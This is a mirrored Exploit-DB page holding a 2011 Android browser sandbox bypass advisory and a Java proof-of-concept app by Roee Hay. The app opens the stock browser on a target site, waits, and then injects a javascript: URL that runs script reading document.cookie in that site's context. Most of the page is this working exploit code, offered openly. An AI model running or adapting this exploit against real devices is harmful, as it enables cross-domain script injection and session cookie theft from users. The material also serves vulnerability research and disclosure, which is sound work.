Open Handset Alliance Android 2.3.4/3.1 – Browser Sandbox Security Bypass - 体验盒子

作者： Roee Hay

日期： 2011-08-02

类别：

remote

平台：

multiple

来源：https://www.exploit-db.com/exploits/36006/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

source: https://www.securityfocus.com/bid/48954/info

Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.

Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.

Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected.

public class CasExploit extends Activity

{

static final String mPackage = "com.android.browser";

static final String mClass = "BrowserActivity";

static final String mUrl = "http://target.domain/";;

static final String mJavascript = "alert(document.cookie)";

static final int mSleep = 15000;

@Override

public void onCreate(Bundle savedInstanceState) {

super.onCreate(savedInstanceState);

setContentView(R.layout.main);

startBrowserActivity(mUrl);

try {

Thread.sleep(mSleep);

}

catch (InterruptedException e) {}

startBrowserActivity("javascript:" + mJavascript);

}

private void startBrowserActivity(String url) {

Intent res = new Intent("android.intent.action.VIEW");

res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));

res.setData(Uri.parse(url));

startActivity(res);

}